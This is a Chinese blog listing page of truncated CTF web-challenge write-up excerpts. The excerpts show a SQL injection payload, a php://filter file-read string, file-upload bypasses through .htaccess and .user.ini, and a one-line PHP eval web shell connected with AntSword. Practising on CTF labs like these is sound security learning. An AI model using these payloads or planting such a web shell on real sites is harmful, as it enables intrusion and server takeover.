上一页 1 2 3 4 5 6 7 8 9 ··· 12 下一页
摘要: 打开题目界面有点科技感,然后找到报表中心的位置 url地方出现了一个奇怪的id,试了下sql注入但是没报错,判断应该不是sql注入,然后就坐牢了 看了wp得在id的地方进行爆破 爆破了1-2500可以知道2333处有不一样的结果 阅读全文
posted @ 2023-11-06 16:14 努力的大魔王 阅读(53) 评论(0) 推荐(0)
摘要: 阅读全文
posted @ 2023-11-06 15:45 努力的大魔王 阅读(88) 评论(0) 推荐(0)
摘要: 根据题目提示,是前端的知识 进入页面,flag按钮灰了按不下去 右键检查发现按钮地方的样式,发现有一个disabled,这里就直接把他删掉点击回车就可以点击了 阅读全文
posted @ 2023-11-06 15:39 努力的大魔王 阅读(13) 评论(0) 推荐(0)
摘要: 万能密码考点 payload ?id=1' or 1=1--+ 阅读全文
posted @ 2023-11-06 15:25 努力的大魔王 阅读(29) 评论(0) 推荐(0)
摘要: 打开界面就是一个文件上传 的界面 然后在bp试了很多种方法都没有成功,还是看了wp 这里需要利用到.use.ini那为什么不用.heaccess?好像这种方法被过滤了,当时我用的时候没有成功 这里的话我们先上传一个.use.ini文件 里面的内容如下 意思是 那么和.user.ini和muma1.j 阅读全文
posted @ 2023-11-06 13:10 努力的大魔王 阅读(55) 评论(0) 推荐(0)
摘要: 这里的话需要注意几个点 cookie中的变量赋值不适用冒号而是等于号 如果后面有路径的话就直接写文件名就好了,不用写后缀 阅读全文
posted @ 2023-11-06 11:32 努力的大魔王 阅读(12) 评论(0) 推荐(0)
摘要: 打开界面是一篇源代码 看到有flag.php文件,直接打开出现错误提示,看来只能用编码读取数据了 需要传入file1和file2 file1编码读取flag.php的内容 file1=php://filter/read=convert.base64-encode/resource=flag.php 阅读全文
posted @ 2023-11-06 11:02 努力的大魔王 阅读(74) 评论(0) 推荐(0)
摘要: 打开页面只有一句话提示,提示有敏感信息泄露 这里的话使用dirresearch扫描网站结构 在这里我们可以看到响应码正常且有反应的多数都是.git文件 这里我们使用Git源码下载的脚本下载Git源码 得到三个文件 用vscode打开得到主要的操作代码 可以看到这是一个比较特别的ctf考点 无参数RC 阅读全文
posted @ 2023-11-05 20:43 努力的大魔王 阅读(15) 评论(0) 推荐(0)
摘要: 这道题没做出来,是看题解解出来的 先上传一个.htacess文件用来后面解析jpg格式的木马 再上传木马图片 注意:这里的木马比较特殊,需要为以下这样子的写法,我也不知道为啥 <script language='php'>@eval($_POST['admin'])</script> 然后蚁剑连接即 阅读全文
posted @ 2023-11-05 16:42 努力的大魔王 阅读(9) 评论(0) 推荐(0)
摘要: 打开界面是查询界面 点击不同的查询页面返回的内容不同,然后url的地址发生变化,毫无疑问注入点在id处 这里直接进行测试 单引号无回显 双引号回显id不存在 初步判断为字符型注入且为单引号包裹 因为双引号出现了id不存在的提示,说明id构造错了,因为使用的是题目原来的id所以只能是单引号包裹然后导致 阅读全文
posted @ 2023-11-05 15:49 努力的大魔王 阅读(68) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 8 9 ··· 12 下一页